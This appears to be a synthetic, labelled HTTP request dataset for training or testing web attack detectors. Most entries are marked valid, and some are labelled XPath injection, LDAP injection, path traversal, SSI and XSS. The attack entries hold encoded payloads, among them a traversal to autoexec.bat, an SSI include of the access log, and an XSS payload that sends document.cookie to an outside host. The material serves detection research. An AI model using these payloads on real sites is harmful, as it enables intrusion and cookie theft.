Expect: oT8d=iIlx;zinlIOcf
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Thu, 08 Sep 05 18:18:55 GMT
If-Match: "dhExo5AzmxbzBeMNCQfj"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 6.9
Pragma: dciedsge='e1Rqe'
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: NTLM bjM2RWRicmNzY2xlZWVyclM5ZHNveTBiYnRjWFR0bm5CeWhl
Range: 4745-5836
Referer: http://rkle.net/iae3y/dSoov.gif
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.4 (Machintosh; U; PPC Mac OS X 2.5; so-dd; rv:5.4.9) Gecko/12734683
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: identity
Upgrade: Hfra/5.2
Warning: 899 www.hlrs.js:0974 "osaznrsham4kiehae5n" "Mon, 18 Jul 05 24:25:09 CET"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41783
Start - Id: 4621
class: Valid
POST /2cDM9mUsN5C8vJP.htm? HTTP/1.0
Content-Length: 155
Content-Language: jn6a8E,dtdad
Content-Encoding: deflate
Content-Location: http://rsuhsn.uk/ikGe.shtml
Content-MD5: dHNhdGE5SWp0aXRuc2lyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Sep 09 01:02:58 GMT
Last-Modified: Sun, 21 Jun 09 10:54:07 CET
Host: 211.226.52.181
Connection: close
Accept: image/png;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: ib2-zjSsn
Cache-Control: min-fresh=3
Client-ip: 90.254.224.52
Cookie: Ts=5jhUhW;Mbhoe4=877;I9_kpositionpassthru.sQ=062771;@O2bJYA=eIV17@.oMl;ewie6ikvHdnzih=r
Cookie2: $Version="2"
Date: Wed, 24 Feb 10 24:44:16 UTC
ETag: "..Cxziiyzvahj66S9YD"
Expect: uttnvaat
From: acjzno@3gxnNel.fr
If-Modified-Since: Sun, 24 May 09 05:19:19 CET
If-Unmodified-Since: Tue, 24 Mar 09 23:05:21 UTC
If-Match: "cm7R7oDiJuHaxDrfU"
If-None-Match: "tGZ5ZYZIj5FaN4Yc0aB"
If-Range: "Qy4_KT-CLB_sTYNh9YrJ"
Max-Forwards: 71
MIME-Version: 3.4
Pragma: way=o5l
Proxy-Authorization: Basic bmF5bjcxZzpoSXJybmVv
Authorization: Basic b2NtZTphbnl5
Range: -0,-2986,-51980
Referer: /c7dsg/reefudeo/tftog.php
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: eceo2/1.4.1.1
UA-CPU: Sparc
UA-Disp: 183,1102,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 834x094
Via: ilZi/9.9 54.62.33.8:86789, Sol/3.4 www.jutue.css, 4.8 www.rhnryzye.jpg
Transfer-Encoding: identity
Upgrade: Gdio/3.6, ryun/2.6, scha/8.3
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

twJewdbrthndn=sqpayAFsTQ&RocrinslhtNOq=9413603&tetj=eubyaQw&olcslhreaMe=6010866457&eteoovi1iejtco=Tsve&7fQZLTLGQicA=vpni2Z0cS0w&nExAorpN4A=kwa4nqIafuiveiee

End - Id: 4621
Start - Id: 15999
class: Valid
GET /brnm0pn33iie/UnNaL1Fhxp_/tw0lba@xaWvKk/iLIOWRCn.tiff? HTTP/1.1
Host: www.tt4inhAe0.net:044
Connection: close
Accept: application/rtf, text/html, video/quicktime
Accept-Charset: x-mac-arabic, koi8-r, cp-950;q=0.1, x-mac-roman;q=0.3
Accept-Encoding: *
Accept-Language: riin-atet, t-kYnr;q=0.6
Cache-Control: no-transform
Client-ip: 95.5.104.71
Cookie: IFR4netcatOj=794;sl0=tstuifh5h6;bE5shrnT2ao=of7niass8yotyetesI
Cookie2: $Version="9"
Date: Tue, 30 Nov 04 10:54:37 GMT
ETag: "foHX3bXLfs1bsOyu"
Expect: 100-continue
From: lnaihJy@tevauie.cz
If-Modified-Since: Thu, 02 Mar 06 02:43:36 GMT
If-Unmodified-Since: Thu, 24 Mar 05 12:14:21 GMT
If-Match: *
If-None-Match: *
If-Range: "khf1-EnS-X88dKAJdLYZ"
Max-Forwards: 1420
MIME-Version: 9.8
Pragma: ee=g
Proxy-Authorization: opvtak edesT=1eHenu
Authorization: Terlae riste=uamseta
Range: 4-136390,-06191
Referer: http://tcmehe.org/diF8bate/khEieat.jpeg
TE: deflate;q=0.9,chunked;q=0.0
Trailer: Accept-Language
User-Agent: mrt5Tt/8.4.3
UA-CPU: PowerPC
UA-Disp: 9829,461,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 273x3585
Via: 5.4 www.izo5h.html
Transfer-Encoding: compress
Upgrade: aieRqe/7.7, c9oee/9.2, Halyoi/5.2, nsb/5.8
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 131.126.252.251
X-Serial-Number: 606819653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15999
Start - Id: 48728
class: XPathInjection
GET /dxi4zoMxWu8-d/dLLIAx81fk7a3.png?infordTe=93E%7C&4uIdat8ausnete=6T3tlabz%27++++or+++++1%3C+++++ssLg4%2FosYh%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D+or++%27z6%27++++%3D+%27&tteoiGe07dd0tcr=4794 HTTP/1.1
Host: www.adhscegua.fr:80
Connection: close
Accept: image/png
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="582"
Date: Mon, 02 Feb 04 23:41:36 GMT
ETag: W/"V8UTY.e7_JhVggpJl"
Expect: 100-continue
From: wdlEt@aLnyEae.st
If-Modified-Since: Mon, 14 Nov 05 21:56:38 UTC
If-Unmodified-Since: Fri, 09 Apr 10 21:44:52 UTC
If-Match: "fbFshIx.4Xyty4MQ"
If-None-Match: "zfo7oCFukF4XNIM4y"
If-Range: *
Max-Forwards: 606
Pragma: gsr0ue='keo'
Proxy-Authorization: NTLM dTZld210U2hpaWhzaFNhdHVyZWRvcmNlZnBxQTNydzJlc3RyYW1o
Authorization: icannb ixryi1m=Aoh9lSu
Range: 7-577073
Referer: http://oE53pcet.ch/bets.dll
TE: trailers
Trailer: Upgrade
User-Agent: sasugnottcetrBfij
UA-CPU: Sparc
UA-Disp: 0723,340,16
UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: HTTP/8.1 www.Tpce.tiff, 9.7 www.aShah.html, 5.8 202.238.250.241
Transfer-Encoding: gzip
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
X-Serial-Number: 3865979
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48728
Start - Id: 19635
class: Valid
GET /qaQMyvlG/qtSde1dtE0/etxhrYOelnmanabyT/ngFeu/chyJrriexewrDcbll/tei1/processing-instructionUBfcopy@YeeM/xf0andaoesInyzFwu3/tuef2ttsreFbanetiylm.jpeg?Fadns=7507114348&kooroedeRs2Ebe=eA HTTP/1.1
Host: 245.49.197.254
Connection: taHa3v
Accept: */*;q=0.4
Accept-Charset: iso-8859-4, x-mac-korean
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=7
Client-ip: 214.52.69.197
Cookie: dc=rce8yweLcdf;5esEwate20n9O=o5nS;oaeYaae=551860
Cookie2: $Version="10"
Date: Mon, 12 Feb 07 24:41:22 CET
ETag: W/"CUhNPirgxLy0Moc"
Expect: 100-continue
From: 5I1Ng@daEopu.org
If-Modified-Since: Wed, 21 Oct 09 18:47:59 UTC
If-Unmodified-Since: Mon, 19 Jun 06 01:38:15 GMT
If-Match: "zCxm1vS4IhDvaEz2d"
If-None-Match: *
If-Range: Tue, 09 Jan 07 08:12:06 GMT
Max-Forwards: 28
MIME-Version: 6.3
Pragma: hholetu='1gp'
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: Basic dllkVXBlbDpyczJsenNTcA==
Range: 3666-92,-7
Referer: http://eowrrLts.biz/ywnbtc1A.mdb
TE: chunked,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.4 (Windows; U; Win98 5.8; Ze-et; rv:8.8.7) Gecko/46937528
UA-CPU: x86
UA-Disp: 1867,055,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2031x847
Via: 9.8 18.48.69.66
Transfer-Encoding: tehgt
Upgrade: emf/6.5
Warning: 311 www.Werengn.htm "uwnHorhfkumatwT" "Wed, 23 Jul 08 22:55:33 GMT"
X-Forwarded-For: 161.92.181.94
X-Serial-Number: 84453733272881684848
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19635
Start - Id: 37250
class: LdapInjection
GET /d9vRGQ6/ija4suw6heeee/0ccUO6GZIP.php4?Yd_jIOMdropFcp8=1YGtECAuR&icR=g+&twzenmnooswulSe=0S72GXdXy&rQntiptrgsa=obtiea55qgi-&C7lstkubi1wim=nr+y&peco2e0e=xod6e&knemerxFumVse=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&bfsi5nteraeotma=teenoydbysaSl0osee&meue3a=Ekl&hyTyc=82671&imnsJdgc=t8tuautss6be0aw&Rv=rme9 HTTP/1.0
Host: www.0q5ji.gov
Connection: htCr5nki
Accept: video/*;q=0.8
Accept-Charset: iso-8859-8
Accept-Encoding: 
Accept-Language: 5Rtveke-sepetll, soq-gujmlia;q=0.3, yei-t7btair;q=0.9, id-aohu;q=0.1
Cache-Control: max-stale
Client-ip: 112.64.200.186
Cookie: iteurchmv=oe3;mmeotsbuces=or\4rwnwet
Cookie2: $Version="04"
Date: Wed, 27 Jan 10 21:47:46 CET
ETag: W/"6-4YAl_C57LZ5Kihr"
From: tlclo@pOIec.be
If-Modified-Since: Thu, 05 Mar 09 24:37:21 UTC
If-Match: *
If-None-Match: "YL96AEEbM6NpIh-@eyf"
If-Range: Tue, 11 Oct 05 12:40:49 GMT
Max-Forwards: 442
Pragma: Lstioa=go4tmmnc
Proxy-Authorization: NTLM TndxVDd6ZE5odnRtbXM5N29hMmdhNG5vY291bnR5b2VnaGJn
Authorization: ehghvt btnqirss=el8ewxw
Referer: /rhsa/ionl6h/eulHrNw/yatdDVo.msf
Trailer: Warning
User-Agent: Mozilla/5.1 (compatible; glvd; Win98; eue6y; u3ir1m9ee; s9txin)
UA-CPU: 68000
UA-Color: color32
UA-Pixels: 1371x144
Via: 7.7 41.14.138.77, 2.8 232.32.4.132
Transfer-Encoding: compress
----: ------------------------------------------

null

End - Id: 37250
Start - Id: 23378
class: Valid
GET /itdxf/whereicHsJgHheboot.ini/QdandpssIha/ihmvhIaqcilnwedscfae/N2XX70AUZOIViA/m-@I2echoGQg/PTPcyWAfJ9ZPwbody/u9f3h/peiHaccaado.htm?MQS4CS=logceo%2B33sE&ipwr8yyo=869444609&rbdlhTtHkomuTtt=s%406Z9NY9&ki=agpsdls&laebeaambnohdf=tlsa++&eo77evp=bqhheae%5D&ioleFt=1y%40W%40YiUTI&g9E=Ekhla&icarWecapeCuob=50576&tfli2Iyosstd=336778&znnCVnUunion4=0&7n7eso52twTl=omowyelron HTTP/1.0
Host: 96.246.143.223
Connection: woa8cgop
Accept: image/png, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: yoei1sd-feojewln;q=0.8, o-lsA;q=0.1, b-uiede9, 7t8r-c4nt;q=0.4, cunraI-tnanwsz;q=0.8
Cache-Control: only-if-cached
Client-ip: 250.226.160.138
Cookie: N2hq9rYPgF-=pe8eoTEruhhorr;grsfa=owjI;rULVKia=e'nm;Preplace81NomZb=122792498
Cookie2: $Version="41"
Date: Sat, 27 Mar 04 03:54:42 UTC
ETag: "PVA.MqLFz4oha73"
Expect: 100-continue
From: kisol@le4e.uk
If-Modified-Since: Thu, 13 Nov 08 17:50:19 GMT
If-Unmodified-Since: Wed, 10 Dec 08 17:21:19 UTC
If-Match: "w9iA8NjVhbU70@c_Y"
If-None-Match: "V7AFxv6lMb8O1jEd6E"
If-Range: Mon, 14 Jan 08 09:28:46 UTC
Max-Forwards: 7
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: NTLM aThhT2FIaGhybWlzbnNkdHNvbmNhbkVzaXMxenN4RHBvaXNaZm5z
Range: 430-,3-,-8
Referer: /wged/oawuuhi.fgf
TE: gzip,chunked,trailers
Trailer: Date
User-Agent: IeA0l (ifMDwcTsJQ; e8FNMr; vtamiHQ; rUm_ceZqE; rxWYpWd)
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 506x4645
Via: 2.1 www.snySdea1.htm
Transfer-Encoding: identity
Upgrade: onIt/4.0, 96i/3.9, ud3/7.4
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 996709990396001467
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23378
Start - Id: 16479
class: Valid
GET /LI.swf?nltblsHtrCzwgr=Inrtyte%5Ctnsl%3Eeo&Tl0eesfI=nn%28optzwG&_4pCK8group byJQcd=a8wjD9&hN5ky6Aqnuqt=memr&eho5g=s%28jrjncshadldNa7nn&scy=orarh7vnttsod&yrhuhnhr4uZekpa=01148 HTTP/1.1
Host: www.EaAfuahdt.org:84
Connection: close
Accept: video/*;q=0.7, text/html, audio/*;q=0.1
Accept-Charset: cp-936, x-mac-ce;q=0.5
Accept-Encoding: deflate, compress;q=0.4
Accept-Language: he6t-9dhsr, d-ygnlkiha;q=0.9
Cache-Control: min-fresh=399
Client-ip: 237.89.204.8
Cookie: dYsyin3l0gM=nrdsAr9kun3o@c$der;3eentitmtsodt=5@
Cookie2: $Version="1"
Date: Sat, 23 Sep 06 07:06:20 GMT
ETag: W/"7ZIa@ypOpsN0Ej0_f"
Expect: afoOaee=ibrbtE
From: enneeci@ehirrnmall.it
If-Modified-Since: Sat, 07 Mar 09 15:29:39 GMT
If-Unmodified-Since: Sun, 30 Apr 06 15:12:13 GMT
If-Match: "hnil.nI4lE1zUM53F_v"
If-None-Match: "5JNyOOXsSqIE1jrX5"
If-Range: "5oEp8CvexltzMBUhVu"
Max-Forwards: 2426
MIME-Version: 3.8
Pragma: pie='uh'
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: NTLM bG9wdzJhM3VxNW9SMnRzbXF4aHJlZWg4dGJldHMzY1JhaUJvaDdsMXVwZnNlc3pl
Range: 367-465064
Referer: http://nxtt3b.com/sel8s5/3rxertrE/6nddnes/aimaup.mdb
TE: trailers,deflate
Trailer: Warning
User-Agent: sliap (sAueIg; sZSXx0o)
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 714x1442
Via: HTTP/1.0 www.mps3.html
Transfer-Encoding: identity
Upgrade: stdm/8.2, nyada9/9.8, Hlft/8.4, sarer/8.3
Warning: 543 www.tjetzkwe.png "ctadem" "Wed, 01 Aug 07 06:58:08 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 764868889317962495
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 16479
Start - Id: 45506
class: PathTransversal
GET /scwKv_yRhlD_.htm?soprjbeinL=i7tTsFMXX_d&g1iibhbriofoaOt=o&feso2smzhegoee=h+YMsamf&huiferer4a28ern=ottI9gT0mnty&pt=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&LespuIHg040h4=Nee+8%28to&irtfyueht1tayoh=otu0uOe4 HTTP/1.0
Host: www.iEsaydses7.cz
Connection: tsrRmnhe
Accept: */*
Accept-Charset: iso-8859-8
Accept-Encoding: *
Accept-Language: arliMsmn-m;q=0.9, 4e-eeyona, Bi-Ee
Cache-Control: no-store
Client-ip: 136.132.185.114
Cookie: ut9=auaolsmlqedWM
Cookie2: $Version="087"
Date: Wed, 17 May 06 09:12:16 GMT
ETag: W/"8s6NLnMvF3qQwwHgq_w"
Expect: 100-continue
From: tetsj@adnocr.uk
If-Modified-Since: Sun, 15 May 05 10:06:11 GMT
If-Unmodified-Since: Tue, 17 Feb 09 24:15:32 GMT
If-Match: "pgR5zD-WwyroUt1"
If-None-Match: "3X65fxKnxeYPp5ve5JV"
If-Range: *
Max-Forwards: 4
MIME-Version: 2.3
Pragma: iieodQo='wgtedbsh'
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: Digest qop=auth-int
Range: 354-,63882-
Referer: /nFinsdt/oirrnl/67oyiue.asmx
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.8 (compatible; Konqueror/0.0; Open BSD i586; us0aiIe; dtpohw)
UA-CPU: MIPS
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2096x915
Via: 7.8 6.182.109.221
Transfer-Encoding: deflate
Upgrade: paa/8.6, yprO/1.1
Warning: 851 www.az5hggy.shtml "VesmErqyeabiHr" "Sun, 05 Mar 06 07:25:39 GMT"
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45506
Start - Id: 13604
class: Valid
GET /pp5M1NMEwWL6/rpi-P-8F0NR/Nf9_iCx_S-3h/AchiRc0gntneosf/tlI1n3Z/ptyh/lnosamet/e4ZG@W_YGPcafjvw@zK/et3ochfean.sh? HTTP/1.1
Host: www.aemsi.biz:80
Connection: nt90s
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=9
Client-ip: 239.64.215.236
Cookie: deihmzitrmwdaic=dOo8itcnodeE4 sd;l0CAPgwRqI=5QGyTzlRk@UD;osfGmRvm=n$aq;ebneapSsehoeyse=irE;h1tiiEh=sonnysbTU
Cookie2: $Version="845"
Date: Sat, 18 Apr 09 22:33:47 UTC
ETag: "Cmu7VHMBILRmsn4Wb5"
Expect: 100-continue
From: hwaei@ybC13e6.ch
If-Modified-Since: Sun, 03 Oct 04 14:02:36 GMT
If-Unmodified-Since: Wed, 11 Jul 07 20:58:39 GMT
If-Match: "ugtVk1tmoD3VdcPiYox"
If-None-Match: *
If-Range: Thu, 28 Feb 08 02:37:16 GMT
Max-Forwards: 898
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="aualn"
Authorization: Digest username="aamrsee"
Range: 8-93898,-3983,-5248
Referer: http://nleo.com/alusp.js
TE: trailers,chunked,deflate
Trailer: Host
User-Agent: iwdeerfts
UA-CPU: Sparc
UA-Disp: 665,655,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 2265x4152
Via: 1.2 www.anAxeoh.shtml
Transfer-Encoding: compress
Upgrade: ksola/7.8, haEuhh/9.9, nrh/5.2, Dl0m/5.1
Warning: 667 193.214.100.224:730 "rhuswliziie6a" "Sat, 17 Apr 04 22:29:46 CET"
X-Forwarded-For: 48.26.121.103
X-Serial-Number: 778234448647
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13604
Start - Id: 39601
class: SSI
GET /iWhnnbae/script@U/irhslueiad4y/HP6wIiiarsbef7OY9/p0bS-uwtKiaHb/taxeUooaas5esGc/eoti7sersrnkr0/echotlnyLISh5Hi5.gif?2igEltlee2mhde=8yvBqIb5&8wTCmettt=I%3D%5C%5Deziaao+h%3Eda6iv&itnOhppm8n=uhmccoohsn5cd&dhaeitXw9Hnwy8=hhras&bsltednrHo2unt=dWy7X&S@2jbg3copy=Drieshieo&sSEeo4r=7812116232&serviceswEvO0formconnectHI=672&jo=9696875938&zci=nFENPYa3u7&oata2By=8160&Dyntbsi=n5qy.uNLx8C&%u23Qm3=%3C%21--+++++%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E HTTP/1.1
Host: www.gaesgkftnb.be
Connection: sfotiS
Accept: image/*, audio/basic, image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, compress;q=0.3
Accept-Language: Wo-lpstaSI;q=0.3, AntAfek-ii
Cache-Control: min-fresh=5713
Client-ip: 239.19.170.214
Cookie: ioodn7=ie;0tamm=01268;xg6FEbin=tilexeclcy8sae eehlsu
Cookie2: $Version="046"
Date: Wed, 13 Jun 07 20:16:01 GMT
ETag: W/"zptMaM3HIXki14TB3"
Expect: nuEdWa
From: k4wcg@aEdi7a2.de
If-Modified-Since: Thu, 01 Dec 05 06:19:50 CET
If-Unmodified-Since: Sun, 15 Apr 07 24:13:26 GMT
If-Match: "TTMv0n5jRO0mN_7ItN-W"
If-None-Match: "CLWXC_Ebp..axSeHsH"
If-Range: Tue, 16 May 06 24:25:15 UTC
Max-Forwards: 594
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic a0k3bm9tOm5yYTg=
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: http://IsTB.it/eiaye/hneAez/arcred2/ytai.conf
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: Mozilla/2.9 (compatible; MSIE 7.5; Open BSD i386; rtlu9c)
UA-CPU: PowerPC
UA-Disp: 7073,179,8
UA-OS: Win9x
UA-Pixels: 1841x260
Via: 0.8 73.60.218.107, 0.5 www.Weiidih.htm
Transfer-Encoding: compress
Upgrade: t8veon/3.4, o1M/1.3, ooayr/1.5, edmt/1.1, ecik/3.7
Warning: 852 134.152.169.139 "ano4rrnmet8s13t" "Mon, 26 May 08 01:24:12 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 51537032626
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39601
Start - Id: 22371
class: Valid
GET /oTG9dWZ2e2Qf3@SsqA.shtml?gatvu=9evwT16gUned&ntuuca7bevi7hd=idcnim&mds3w3usEsbd=8784984&OarmN0kziou=7&_cxooYs8=a%28&8e8=3%7Et+&0vz-Z@g@=5ccelueEeta&9egs43t1i=s0V&seertuwnT1bkE8=32658 HTTP/1.0
Host: 231.48.104.76:80
Connection: keep-alive
Accept: audio/*;q=0.6, text/html;q=0.6
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.2
Accept-Language: ie-bc, mi-he, oYid-lhttss;q=0.3, rOim85-l5iL0q;q=0.4, tY99o-72n
Cache-Control: no-store
Client-ip: 103.42.173.157
Cookie: oa=08;molrtoonltdStex=A ;cnmpc=7hatW9sdnO;i6dseoostnmsa=bH25;yo2noaYe=t%idC;cwJJautoexecIV=execshttpchildy3a=ilidneI)
Cookie2: $Version="5"
Date: Mon, 24 Jul 06 17:58:44 GMT
ETag: "LsESLOWvlf5dB@UN"
Expect: 100-continue
From: td9h@ogde.be
If-Modified-Since: Thu, 18 Dec 08 15:50:04 GMT
If-Unmodified-Since: Sat, 05 Aug 06 22:16:52 CET
If-Match: *
If-None-Match: "o5MOIeF9fbEi_3f2Nlaa"
If-Range: Tue, 27 Oct 09 17:49:42 CET
Max-Forwards: 65
MIME-Version: 8.8
Pragma: 0t='dsseiIt'
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: Digest qop=auth-int
Range: 541-893,-04,-1
Referer: http://www.DEale0et.st/oieiet/Onncl/epjs/tlilu/keiodorl.php3
TE: gzip;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.6 (X11; U; Linux i586 3.8; ix-nt; rv:5.8.9) Gecko/71301718
UA-CPU: MIPS
UA-Disp: 0605,1336,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 112x1566
Via: HTTP/2.9 www.tsze7hse.js
Transfer-Encoding: deflate
Upgrade: ncmcde/3.0, naroen/8.2
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22371
Start - Id: 14230
class: Valid
GET /wp-U/HY2ew/aU5Hv.bin? HTTP/1.1
Host: www.kqc9o.de
Connection: brIeE8Ea
Accept: text/xml;q=0.0
Accept-Charset: x-mac-japanese;q=0.9, iso-8859-6, iso-8859-7;q=0.8
Accept-Encoding: deflate;q=0.1, gzip;q=0.7, gzip;q=0.6, compress, deflate
Accept-Language: bn-eptrhlen, eDSNed-lgna;q=0.1, EtSkgnr-tEibaob;q=0.5, ptla-eEed6, a0Rmrzdi-et9sJrLs;q=0.0
Cache-Control: no-store
Client-ip: 222.155.249.216
Cookie: horeoni=8ne0;VhtaccesJgp=rfe;nnodamn5n=3486929;soeiebsmcoDSdl=19819;Este=97994
Cookie2: $Version="64"
Date: Fri, 14 Dec 07 11:17:51 GMT
ETag: W/"AeZN8RZMmoUH4hCBsnaF"
Expect: 100-continue
From: ytnpe@aitntig.fr
If-Modified-Since: Sun, 19 Jun 05 01:02:10 CET
If-Unmodified-Since: Fri, 16 Jan 09 22:00:24 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 183
MIME-Version: 0.5
Pragma: a='r1co'
Proxy-Authorization: iAwt ytdeMtan=qbp5ee
Authorization: ucneh wbex=kmvs6
Range: -901847,5-685
Referer: /ceRobrOf/bxdc3.jpeg
TE: deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.2 (Windows; U; WinNT 8.2; ll-ti; rv:9.2.5) Gecko/60994493
UA-CPU: x86
UA-Disp: 985,925,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 962x171
Via: FTP/0.4 www.hsse.shtml
Transfer-Encoding: identity
Upgrade: wnhl/8.5, 1nsn/8.5
Warning: 616 154.56.254.74 "ansu3dtaabmzoDoqtefe" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 21052565504410930240
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14230
Start - Id: 47308
class: XSS
GET /hXAhJDYQURPCin/oe5ts5uyIs17cmI6ftei/eHvw-2cj./Vcj4pe.dG/NRuhfU6AtO/WVEinsert/teftoh6eoimoap5tS/eG@NhjupMjj5HYH.bin?oolsdttnreaatii=hqo&fycornnr=638&.NqO0EFk=oqqdropi+ewindow.openpndropiepasswd%28r&3tEnnatl8na=m4zsadgtpaudsaADa&7JT3=%3Ca+++++href+%3D%22about%3A%3Cs%26%2399%3Bript+++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.litansme.com%2Fcgi-bin%2Fdealatesni.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E%22+%3E&poldN5t9na=fb1lacjndna&igedaykl=pttEeuspasswde&tll4raRSEmdse=6ho8eete&ittTe4=49553982&ndpr=0337864740&fgdsstpao=r%26nh%29iTxDt+t-7y%25uE&dmeltn=162&nmristeondrlsn=929 HTTP/1.1
Host: www.ngts.be
Connection: keep-alive
Accept: audio/*;q=0.0, image/jpeg, text/xml
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 7a3yntHD-saoao, nuEneh-5f;q=0.7, 682ejiee-eid;q=0.4, iu8-OSy;q=0.1, SteKwPoo-bians
Cache-Control: max-stale
Client-ip: 104.102.195.181
Cookie: rrirRhRd=4gtp+o
Cookie2: $Version="659"
Date: Sun, 17 May 09 18:53:22 GMT
ETag: W/"kmh.JRxb6nN3qMqK1"
Expect: 100-continue
From: told@ol9na.de
If-Modified-Since: Fri, 19 Feb 10 21:43:02 GMT
If-Unmodified-Since: Tue, 07 Jul 09 16:28:04 CET
If-Match: *
If-None-Match: "_xafT1FZA3sPDfocKFso"
If-Range: Tue, 02 Dec 08 22:15:20 CET
Max-Forwards: 6063
MIME-Version: 0.1
Pragma: doodb1gc=En2gisp
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: eljvaE dmsot=omnus5
Range: 498-
Referer: http://www.sei5yet.net/Rygg55/o1hni.js
TE: deflate,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (compatible; eainri; Open BSD i386; aode7k; oRihaNit; r5uecNEbso)
UA-CPU: Sparc
UA-Disp: 8442,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
